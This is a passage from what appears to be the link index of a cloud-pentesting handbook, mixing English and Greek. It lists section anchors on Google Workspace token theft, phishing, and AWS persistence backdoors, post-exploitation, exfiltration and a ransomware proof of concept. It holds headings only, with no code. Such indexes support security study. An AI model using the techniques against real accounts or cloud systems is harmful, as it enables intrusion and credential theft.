ctory-sync.html#gcds---disk-tokens--ad-credentials","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---Εξαγωγή-tokens-από-τη-μνήμη","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---Δημιουργία-διαπιστευτηρίων-πρόσβασης-από-ανανεωτικά-διαπιστευτήρια","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---mitm","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Δακτυλικό-αποτύπωμα","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Λάβετε-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Ανανεώστε-tokens-Μητρώου","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Δίσκοι-Ανανεωτικών-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---dumping-tokens-από-τη-μνήμη-διαδικασιών","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Δημιουργία-διαπιστευτηρίων-πρόσβασης-από-ανανεωτικά-διαπιστευτήρια","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---Ανάκτηση-καθαρού-κωδικού-πρόσβασης","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#Αναφορές","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---configuration","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---dumping-password-and-token-from-disk","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---dumping-tokens-from-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---Δημιουργία-διαπιστευτηρίων-πρόσβασης-από-ανανεωτικά-διαπιστευτήρια","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#gws---google-platforms-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#generic-phishing-methodology","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-groups-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-chat-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-doc-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-calendar-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-redirect-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-oauth-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#oauth-apps-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#unverified-app-prompt","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#interesting-scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#create-an-oauth-app","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#Αναφορές","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#gws---app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Δημιουργία-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Σενάριο-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Δημιουργία-google-sheet-με-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Διαρροή-token","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Δημιουργία-trigger","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Κοινοποίηση","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Κατάχρηση-εγγράφων-shared-with-me","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Αντιγραφή-αντί-για-κοινοποίηση","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Κοινοποίηση-ως-web-application","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Δοκιμή","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-ως-Επιμονή","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#Παράκαμψη-Μη-Επαληθευμένης-Προτροπής-Εγγράφου","pentesting-cloud/aws-security/index.html#aws-pentesting","pentesting-cloud/aws-security/index.html#basic-information","pentesting-cloud/aws-security/index.html#labs-to-learn","pentesting-cloud/aws-security/index.html#aws-pentesterred-team-methodology","pentesting-cloud/aws-security/index.html#basic-enumeration","pentesting-cloud/aws-security/index.html#ssrf","pentesting-cloud/aws-security/index.html#whoami","pentesting-cloud/aws-security/index.html#org-enumeration","pentesting-cloud/aws-security/index.html#iam-enumeration","pentesting-cloud/aws-security/index.html#services-enumeration-post-exploitation--persistence","pentesting-cloud/aws-security/index.html#privilege-escalation","pentesting-cloud/aws-security/index.html#publicly-exposed-services","pentesting-cloud/aws-security/index.html#compromising-the-organization","pentesting-cloud/aws-security/index.html#from-the-rootmanagement-account","pentesting-cloud/aws-security/index.html#automated-tools","pentesting-cloud/aws-security/index.html#recon","pentesting-cloud/aws-security/index.html#privesc--exploiting","pentesting-cloud/aws-security/index.html#audit","pentesting-cloud/aws-security/index.html#Συνεχής-Έλεγχος","pentesting-cloud/aws-security/index.html#debug-Καταγραφή-αιτημάτων-aws-cli","pentesting-cloud/aws-security/index.html#Αναφορές","pentesting-cloud/aws-security/aws-basic-information/index.html#aws---Βασικές-Πληροφορίες","pentesting-cloud/aws-security/aws-basic-information/index.html#Ιεραρχία-Οργάνωσης","pentesting-cloud/aws-security/aws-basic-information/index.html#Λογαριασμοί","pentesting-cloud/aws-security/aws-basic-information/index.html#Οργανωτικές-Μονάδες","pentesting-cloud/aws-security/aws-basic-information/index.html#service-control-policy-scp","pentesting-cloud/aws-security/aws-basic-information/index.html#arn","pentesting-cloud/aws-security/aws-basic-information/index.html#iam---identity-and-access-management","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-account-root-user","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-users","pentesting-cloud/aws-security/aws-basic-information/index.html#mfa---multi-factor-authentication","pentesting-cloud/aws-security/aws-basic-information/index.html#Ομάδες-χρηστών-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Ρόλοι-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Προσωρινά-διαπιστευτήρια-στο-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Πολιτικές","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-boundaries","pentesting-cloud/aws-security/aws-basic-information/index.html#session-policies","pentesting-cloud/aws-security/aws-basic-information/index.html#Ομοσπονδία-Ταυτότητας","pentesting-cloud/aws-security/aws-basic-information/index.html#Κέντρο-Ταυτότητας-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Διασυνοριακές-Εμπιστοσύνες-και-Ρόλοι","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-simple-ad","pentesting-cloud/aws-security/aws-basic-information/index.html#Άλλες-επιλογές-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Πρόθεμα-id-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#Συνιστώμενες-άδειες-για-έλεγχο-λογαριασμών","pentesting-cloud/aws-security/aws-basic-information/index.html#Διάφορα","pentesting-cloud/aws-security/aws-basic-information/index.html#Αυθεντικοποίηση-cli","pentesting-cloud/aws-security/aws-basic-information/index.html#Αναφορές","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#aws---Κατάχρηση-Ομοσπονδίας","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#saml","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---Κατάχρηση-github-actions","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#the-workflow-should-only-trigger-on-pull-requests-to-the-main-branch","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#required-to-get-the-id-token-that-will-be-used-for-oidc","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#crate-an-eks-cluster-10min","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#create-an-identity-provider-for-an-eks-cluster","pentesting-cloud/aws-security/aws-permissions-for-a-pentest.html#aws---permissions-for-a-pentest","pentesting-cloud/aws-security/aws-persistence/index.html#aws---Επιμονή","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#aws---api-gateway-persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#modify-lambda-authorizers","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#iam-permissions","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-keys","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#aws---cognito-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#Διαρκεια-Χρήστη","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito-idpsetriskconfiguration","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#aws---dynamodb-persistence","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-triggers-with-lambda-backdoor","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-ως-Κανάλι-c2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#aws---ec2-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Παρακολούθηση-Σύνδεσης-Ομάδας-Ασφαλείας","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2-lifecycle-manager","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#Προγραμματισμένες-Εγκαταστάσεις","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#spot-fleet-request","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-instances","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-launch-configuration","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpn","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpc-peering","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#aws---ecr-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#ecr","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#Κρυφή-Εικόνα-docker-με-Κακόβουλο-Κώδικα","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#Πολιτική-Αποθετηρίου","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#Πολιτική-Μητρώου--Διασυνοριακή-Αναπαραγωγή","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#aws---ecs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#Κρυφή-Περιοδική-Εργασία-ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#backdoor-container-in-existing-ecs-task-definition","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#undocumented-ecs-service","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#aws---elastic-beanstalk-persistence","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#persistence-in-instance","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#backdoor-in-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#new-backdoored-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#abusing-custom-resource-lifecycle-hooks","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#aws---efs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#efs","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#Τροποποίηση-Πολιτικής-Πόρου--Ομάδες-Ασφαλείας","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#Δημιουργία-Σημείου-Πρόσβασης","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#aws---iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Κοινές-Τεχνικές-iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Πολιτικές-Εμπιστοσύνης-Ρόλου-backdoor","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Πολιτική-Πίσω-Πόρτας-Έκδοση","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#Πίσω-Πόρτα--Δημιουργία-Παρόχου-Ταυτότητας","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#aws---kms-persistence","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#Παροχή-πρόσβασης-μέσω-πολιτικών-kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#Αιώνια-Παροχή","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#aws---lambda-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-layer-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-extension-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#versions-aliases--weights","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#version-backdoor--api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#cronevent-actuator","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#aws---Κατάχρηση-Επεκτάσεων-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#Επεκτάσεις-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#Εξωτερική-Επέκταση-για-Διαρκή-Πρόσβαση-Κλοπή-Αιτημάτων--τροποποίηση-Αιτημάτων","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#Αναφορές","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#aws---lambda-layers-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layers","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#python-load-path","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#Προφορτωμένες-βιβλιοθήκες","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#backdooring-lambda-layer","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#Εξωτερικά-layers","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#aws---lightsail-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#Λήψη-κλειδιών-ssh--κωδικών-βάσης-δεδομένων-της-instace","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#backdoor-instances","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#dns-επιμονή","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#aws---rds-persistence","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#Κάντε-την-παρουσία-δημόσια-προσβάσιμη-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#Δημιουργία-ενός-χρήστη-διαχειριστή-μέσα-στη-βάση-δεδομένων","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#Δημιουργία-δημόσιου-στιγμιότυπου","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#aws---s3-persistence","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#s3","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#kms-client-side-encryption","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#using-s3-acls","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#aws---sns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#sns","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#Δημιουργία-Συνδρομητών","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#aws---Διαχείριση-Μυστικών-Επιμονής","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#Διαχείριση-Μυστικών","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#Μέσω-Πολιτικών-Πόρων","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#Μέσω-lambda-Περιστροφής-Μυστικών","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#aws---sqs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#sqs","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#Χρησιμοποιώντας-πολιτική-πόρων","pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.html#aws---ssm-perssitence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#aws---Διατήρηση-Λειτουργιών-Βημάτων","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#Λειτουργίες-Βημάτων","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#Πίσω-πόρτα-σε-Λειτουργία-Βημάτων","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#Πίσω-πόρτα-σε-ψευδώνυμα","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#aws---sts-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#sts","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#assume-role-token","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#role-chain-juggling","pentesting-cloud/aws-security/aws-post-exploitation/index.html#aws---Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#aws---api-gateway-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#api-gateway","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#Πρόσβαση-σε-μη-εκτεθειμένα-apis","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#Παράκαμψη-request-body-passthrough","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#usage-plans-dos","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdategatewayresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdatestage-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayputmethodresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdaterestapi-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewaycreateapikey-apigatewayupdateapikey-apigatewaycreateusageplan-apigatewaycreateusageplankey","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#aws---cloudfront-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#cloudfront","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#man-in-the-middle","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#aws---codebuild-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#Έλεγχος-Μυστικών","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#Κατάχρηση-Πρόσβασης-repo-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#Διαρροή-access-tokens-από-το-aws-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeleteproject","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuildtagresource--codebuilduntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeletesourcecredentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#aws-codebuild---token-leakage","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#Ανάκτηση-Ρυθμισμένων-tokens-από-githubbitbucket","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-docker-image","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-insecuressl","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#Μέσω-πρωτοκόλλου-http","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#aws---control-tower-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#control-tower","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#Ενεργοποίηση--Απενεργοποίηση-Ελέγχων","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#aws---dlm-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#data-lifecycle-manger-dlm","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#ec2describevolumes-dlmcreatelifecyclepolicy","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#aws---dynamodb-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodb","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbbatchgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbquery","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbscan","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbpartiqlselect","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbexporttabletopointintimedynamodbupdatecontinuousbackups","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbcreatetable-dynamodbrestoretablefrombackup-dynamodbcreatebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbputitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbupdateitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletetable","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbstreamspecification-dynamodbupdatetable-dynamodbdescribestream-dynamodbgetsharditerator-dynamodbgetrecords","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#aws---ec2-ebs-ssm--vpc-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ec2--vpc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Κακόβουλο-vpc-mirror----ec2describeinstances-ec2runinstances-ec2createsecuritygroup-ec2authorizesecuritygroupingress-ec2createtrafficmirrortarget-ec2createtrafficmirrorsession-ec2createtrafficmirrorfilter-ec2createtrafficmirrorfilterrule","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Αντιγραφή-Εκτελούμενης-Περίπτωσης","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#data-exfiltration","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#open-security-group","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#privesc-to-ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#remove-vpc-flow-logs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ssm-port-forwarding","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Αναζήτηση-ευαίσθητων-πληροφοριών-σε-δημόσιες-και-ιδιωτικές-amis","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#Κοινή-χρήση-στιγμιότυπου-ebs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-ransomware-poc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#aws---ebs-snapshot-dump","pentesting-cloud/aws-security/aws